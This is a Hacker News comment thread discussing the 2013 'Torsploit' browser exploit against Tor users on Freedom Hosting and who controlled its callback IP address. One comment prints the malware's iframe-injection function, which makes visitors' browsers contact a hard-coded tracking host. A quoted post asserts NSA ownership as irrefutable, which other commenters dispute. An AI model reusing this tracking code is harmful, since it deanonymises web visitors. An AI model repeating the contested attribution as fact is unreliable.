
Torsploit takedown: analysis, reverse engineering, forensic - detcader
https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3852
======
ParadisoShlee
I'm not a tin foil kind of guy.... I think it's pretty safe to say the freedom
hosting takedown and tor targeted exploit is a masterstroke of saber rattling
and psyops dick waving.

Target and capture somebody (possible evil douchebag) who is hidden behind
seven proxies, gain access to highly secure 'hidden .onion' servers used by
people who want to stay hidden, scare the TOR user base by proving they can
identify you easily while also not giving a fuck about burning one of the
many exploits in their bag - in a single move!

~~~
nilved
It's purely coincidental and to their luck that they were able to find the
hosting provider, and that the provider happened to host so many valuable
targets. The exploit isn't at all special.

~~~
ParadisoShlee
Yes, it's coincidental but it's a fun story. Sadly, the facts are not really
available to confirm :)

Regardless, I don't know why the freedom hosts lasted so damn long.

------
throwaway912397
The forum thread relies on a domaintools.com query [1], which points to
"SCIENCE APPLICATIONS INT" [2] as the owner of this 65.222.202.53 Class C
subset (65.222.202.53 is found in the updatify() function listed below [3]).
You might recognize SAIC from the NSA's 'XKEYSCORE Systems Engineer' job
posting thread [4] a couple of days ago.

    
    
      // Appends a near-invisible (5px high, no border) iframe to the page,
      // making the browser request the hard-coded callback IP with a
      // per-visit requestID.
      function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
        iframe.height = "5";
        iframe.width = "*";
        document.body.appendChild(iframe);
      }
    

[1] [http://www.domaintools.com/research/ip-explorer/?ip=65.222.2...](http://www.domaintools.com/research/ip-explorer/?ip=65.222.202.53)

[2]
[http://en.wikipedia.org/wiki/SAIC_%28U.S._company%29](http://en.wikipedia.org/wiki/SAIC_%28U.S._company%29)

[3]
[https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#...](https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3849)

[4]
[https://news.ycombinator.com/item?id=6138205](https://news.ycombinator.com/item?id=6138205)

~~~
DannyBee
SAIC is a huge defense contractor with their fingers in a large number of
pies. Anything SAIC related is certainly government related, but not
necessarily NSA.

~~~
lawnchair_larry
I'm not sure the distinction of what is and is not NSA proper is even
meaningful anymore. They deal with national security and intelligence, not
child porn, so they almost certainly weren't the primary actor in this case.
But given all of the contractors and cooperating agencies and resources that
are publicly known, which I would assume is only the tip of the iceberg, it
makes little practical difference which agency is on the badge of who pulls
the final trigger.

Given the IP space involved, SAIC's involvement, their known existing work in
this area including their willingness to purchase exploits for government/law
enforcement, and the target, it's a huge stretch to come up with any other
explanation.

As someone usually ending up on the anti-NSA side of these discussions, I
don't think there is anything particularly surprising or worrying about this.
They (whichever agency it was) used an exploit in what was a fairly
significant bust in their eyes. I haven't personally analyzed it but I gather
it did something ranging from log identifiable information to installing
malware. Regardless of what it did, this is a pretty expected law enforcement
tactic for adversaries of this nature.

As pointed out by you and others, SAIC definitely has fairly incompetent
moments, but they have a lot of money. This is why they can put enough of an
attack together to deliver a sophisticated exploit (likely purchased) and
execute on the operation, while still leaving their tracks on everything and
being somewhat sloppy.

I've seen mixed comments as to whether or not it was actually patched
upstream, but if it was, that makes even more sense. If it was patched, they
_had_ to use it before it made it into the Tor bundle, or lose it entirely.
Generally, high value exploits that are 0day - unknown and unpatched, are not
given to law enforcement.

I think to suggest this was "psyops" or something is giving SAIC _far_ too
much credit. It was just a sloppy raid that used an exploit, for any number of
legitimate reasons.

~~~
DannyBee
Oh sure, i don't believe it was psyops. As you said, i'm sure SAIC bought the
exploit, and then used it in a mildly incompetent way.

I'm sure they even had meetings and documents about it, too!

------
powertower
I've got a bunch of TOR originating traffic coming into a clearweb "whats-my-
ip" service that I run, that's really odd (it uses a Chrome user-agent string
and appears to be coming from a script, maybe even JS being executed in a
Browser).

It's been going on for about 4 months now. I've posted my summary here -
[http://www.devside.net/blog/strange-tor-traffic-to-get-ip](http://www.devside.net/blog/strange-tor-traffic-to-get-ip)

------
detcader
The website seems slow right now. Alternative link on ars:
[http://arstechnica.com/tech-policy/2013/08/researchers-say-t...](http://arstechnica.com/tech-policy/2013/08/researchers-say-tor-targeted-malware-phoned-home-to-nsa/)

Relevant links:

[http://www.domaintools.com/research/ip-explorer/?ip=65.222.2...](http://www.domaintools.com/research/ip-explorer/?ip=65.222.202.53)

[http://pop.robtex.com/nsa.gov.html#records](http://pop.robtex.com/nsa.gov.html#records)

------
api
One thought: the use of a browser exploit to target Tor is _perhaps_ an
admission that onion routing itself is not easily cracked.

~~~
rorrr2
It's probably hard to gather meaningful evidence. Just think of how they would
have to present it to the clueless jury.

It's much easier to show a direct access to some child porn site.

I'm almost certain NSA controls a bunch of nodes and exit nodes and can figure
out who loads what. VPN is the way around it.

~~~
tokenizerrr
When you visit .onion sites exit nodes don't come into play.

As for controlling a bunch of nodes and figuring out who loads what, that is not
possible, as far as I understand how the network works. How it works is that
the sender decides on a path which consists of a random number of other
regular nodes. It encrypts a message with the public key of each of the nodes,
and then sends it on its merry way to the first node. None of the nodes know
if they're the first, the second, or the last. All they know is the address of
the previous and the next node, either of which can be other nodes in the
chain or the origin or the destination.

~~~
tonfa
> As for controlling a bunch of nodes and figuring out who loads what is not
> possible, as far as I understand how the network works.

Given the number of tapping points, the NSA might be considered a global
passive adversary (or close to one) at this point. Tor does not protect
against that.

------
jonknee
It appears that this is actually a Firefox exploit that was patched a while
back. Hurray for auto-updating browsers. I read suggestions of using a LiveCD,
but that seems like it would leave you stuck to security fixes like this. If
you were using Tails you could at least have had a random MAC
([https://tails.boum.org/contribute/design/MAC_address/](https://tails.boum.org/contribute/design/MAC_address/)),
but this attack could have been a _lot_ worse if it wanted more than the MAC.

Since the OP didn't mention it, here's the gist of what happened:

1) A bug in Firefox related to the onreadystatechange event could end up
arbitrarily executing memory on a page reload.

2) The attack created a Windows executable using JavaScript's typed arrays
and array buffers (pretty interesting in its own right).

3) The executable phones home with a MAC address and Windows hostname.

------
detcader
huh, the title of my post changed and it lost 7 points? random changes like
this seem common on HN, interested in why

the original title was "Independent research claims NSA behind Tor Browser
exploit, owns 65.222.202.53" -- which I think is completely reasonable and
accurate

~~~
sp332
The new title is a better description of what the article is about. If you
just want to submit the AS ownership, you could link to
[http://pop.robtex.com/nsa.gov.html#records](http://pop.robtex.com/nsa.gov.html#records)

~~~
LoganCale
It describes what the article is about in general but removes why it is
specifically relevant.

------
detcader
Full forum post quoted below (I didn't write it, just found it on social media
a little while ago):

"Well, the story gets more interesting...

This morning, we read that information from the NSA's illegal surveillance
databases has been routinely finding its way into DEA drug cases [1], with an
entire government "training programme" in existence to mask the source of the
information from defendants... as well as prosecutors and judges.

And this weekend, we've been working through the news that a large breach of
security associated with the Tor network - it's been dubbed #torsploit [2] -
has taken place. Exploit code is available (see earlier posts in this thread),
and folks have been de-obfuscating and analysing the code.

There's also an IP address hard-coded into it - that's where the info gathered
by the malware is being sent. That IP address is:

65.222.202.53

Now, the press reporting on the address so far has been saying it's a "Verizon
business address in Virginia." Yes, that's what whois shows, but that's not
exactly the full story, or the real story.

The folks at Baneki Privacy Labs have been chasing down that detail. They
first asked [3], in a game-theoretic way, whether the entire situation isn't a
bit too, well... obvious. I mean, did the FBI think nobody would notice?
Everyone's been assuming it's the FBI, doing something like the "Darkmarket
honeypot," [4] or some such. It's worth noting that nobody has taken public
credit for this #torsploit [5] malware yet, so attributing it to the FBI is a
leap of assumptive logic.

Turns out, the story is much more interesting than that.

Baneki dug deeper than whois, and got some clues things were spookier than
they seemed. First, there's an open port (80) [6] sitting on the machine in
question. So it's not some recycled or attempted-at-obfuscated IP address.
It's still live and running. Then the fun starts... [7]

SAIC.png [a]

SAIC is, needless to say, deep in the core of the cyber-military complex...
and certainly not the FBI.

Some further investigation by Baneki turns up the following information [8]:

NSA.png [b]

That IP address is part of IP space directly allocated to the NSA's Autonomous
Systems (AS). It's not FBI; it's NSA.

What is an NSA IP address doing as a command & control contact for javascript
malware being deployed in the #torsploit [9] attack? That remains to be
seen... but we already know that PRISM data has been "jumping the wall" and
leaking into other law enforcement hands. Is this an example of further abuse
of PRISM's "national security only" dataset? That appears the most likely
explanation, at this point in time.

Glenn Greenwald has been warning us this is happening - and here's another
hard, objective, irrefutable data point. The NSA's Alexander - who only last
week was at DefCon doing his best to charm the audience [10] - is once again
caught lying bald-faced.

What happens now? We sit back to await developments..."

[1]
[http://mobile.reuters.com/article/idUSBRE97409R20130805?irpc...](http://mobile.reuters.com/article/idUSBRE97409R20130805?irpc=932)
[2]
[https://twitter.com/search?q=%23torsploit&src=typd](https://twitter.com/search?q=%23torsploit&src=typd)
[3]
[https://twitter.com/Baneki/status/364323285003014144](https://twitter.com/Baneki/status/364323285003014144)
[4]
[https://www.cryptocloud.org/viewtopic.php?f=17&t=87](https://www.cryptocloud.org/viewtopic.php?f=17&t=87)
[5]
[https://twitter.com/search?q=%23torsploit&src=typd](https://twitter.com/search?q=%23torsploit&src=typd)
[6]
[https://twitter.com/Baneki/status/364336090057949184](https://twitter.com/Baneki/status/364336090057949184)
[7]
[https://twitter.com/Baneki/status/364340406361665536](https://twitter.com/Baneki/status/364340406361665536)
[8]
[http://pop.robtex.com/nsa.gov.html#records](http://pop.robtex.com/nsa.gov.html#records)
[9]
[https://twitter.com/search?q=%23torsploit&src=typd](https://twitter.com/search?q=%23torsploit&src=typd)
[10]
[https://twitter.com/CryptoCloudVPN/status/362864059105820674](https://twitter.com/CryptoCloudVPN/status/362864059105820674)
[a] [http://i.imgur.com/9d3fj2G.png](http://i.imgur.com/9d3fj2G.png) [b]
[http://i.imgur.com/PGnNvx9.png](http://i.imgur.com/PGnNvx9.png)

~~~
devindotcom
Sorry to be ignorant, but I don't see where 65.222.202.53 is shown to be NSA-
owned? I don't see that in the robtex record. Am I reading it wrong? I'm not
familiar with this notation, I don't often look into IP allocation issues.

~~~
VMG
[http://jodies.de/ipcalc?host=65.192.0.0&mask1=11&mask2=](http://jodies.de/ipcalc?host=65.192.0.0&mask1=11&mask2=)

    
    
         HostMin:   65.192.0.1
         HostMax:   65.223.255.254

~~~
devindotcom
Thank you, I think that clears it up for me.

------
thrownaway2424
Hasn't it always been perfectly clear that ~all Tor exit nodes are owned by
intelligence agencies? You only need a relatively small fraction of the exit
nodes to pwn the entire system.

~~~
weinzierl
I attended a talk of Roger Dingledine and Jacob Appelbaum two weeks ago and
during Q and A the topic of compromised exit nodes came up. If I understood
Jacob Appelbaum correctly he said that he didn't believe most exit nodes are
owned by intelligence agencies. His reasoning was it was not needed, because
they could use the data from comprehensive wire-taps for much the same effect.
He also said that if they are already after you, Tor is not going to help
you.

I'm not an expert in Tor and I attended the talk tired and after a hard day's
work, so I might have completely misunderstood him.

~~~
griffordson
Was it this talk?

[https://www.youtube.com/watch?v=-VUyuFH9CbI](https://www.youtube.com/watch?v=-VUyuFH9CbI)

------
hosay123
As much as I love drama, the notion that the NSA would hardcode a registered
IP address of their own into some malware and use that to attack some very
publicized network affecting thousands of users.. well..

As another comment points out, why bother when you already coordinate a
massive sniffing effort affecting large chunks of the globe?

~~~
Fuzzwah
But what is the alternative... someone has pwnd an NSA box and is using it as
a CC server for malware that they've injected into all sites hosted by some
guy who was just arrested?

~~~
UVB-76
Possible alternative is that a third party wrote the malware and decided to
put an NSA/SAIC IP address in the code to scare people

~~~
LoganCale
And then deployed this exploit just before the Freedom Hosting founder, on
whose servers the exploit was found, was arrested?

~~~
UVB-76
Just saying putting an IP address in some code doesn't mean the owner of that
IP address is responsible for writing the code.

~~~
LoganCale
You're missing the point. The fact this exploit showed up just before the
server owner was arrested strongly suggests the feds are involved.

~~~
hosay123
I hear a "shooting star" was seen the night of the Tunguska event. The fact
this shooting star showed up just prior to an enormously powerful explosion
suggests the allies had nuclear weapons in 1908, and that they were supplied
by aliens from another world.

For any given series of boring events, the most fantastical explanation that
ties them all together must obviously be true.

~~~
Fuzzwah
This is my preferred Tunguska conspiracy:

[http://www.teslasociety.com/tunguska.htm](http://www.teslasociety.com/tunguska.htm)

ps: I don't care if it is correct, it is still an interesting read.

------
dmix
The website loads perfectly if you take out s in http[s]

[http://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p...](http://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3852)

~~~
staunch
NSA blocking the SSL version :-)

------
nkuttler
The site is extremely slow, I got the text to load but apparently relevant
images aren't loading. It's not in google cache yet either. If somebody could
save the entire page and upload it somewhere (or something).. that would be
great.

------
mtgx
Freenet's statement about the takedown:

[https://freenetproject.org/news.html#2013-tor-bust](https://freenetproject.org/news.html#2013-tor-bust)

------
at-fates-hands
Anybody think this could be someone other than the NSA at work here? Maybe a
good frame job from someone like Anon or the Chinese?

------
ToothlessJake
Someone in a previous thread about ex-NSA Russell Tice asked "Say what you
like about Snowden, but at least some of his claims have been backed up by
evidence. What have these guys got? Why not name names?"

I responded with: A stay in a penitentiary managed in part by SAIC[1].

Digitally stalked due to dissent by for-profit "Domain Awareness Centers" run
by SAIC[2].

Persistent targeting, one way or another, by drones managed by SAIC[3].

Now after this, I can add "Hunting and exposing swaths of users as to
pursue/prosecute/rendition/drone a few via disseminating exploits used against
those that dare encrypt their traffic[4]".

[1]
[http://www.alanco.com/news_040104.asp](http://www.alanco.com/news_040104.asp)

[2]
[http://oaklandwiki.org/Domain_Awareness_Center](http://oaklandwiki.org/Domain_Awareness_Center)

[3] [http://www.dailyfinance.com/2013/06/14/news-saic-wins-95-mil...](http://www.dailyfinance.com/2013/06/14/news-saic-wins-95-million-drone-management-contrac/)

[4]
[https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#...](https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3852)

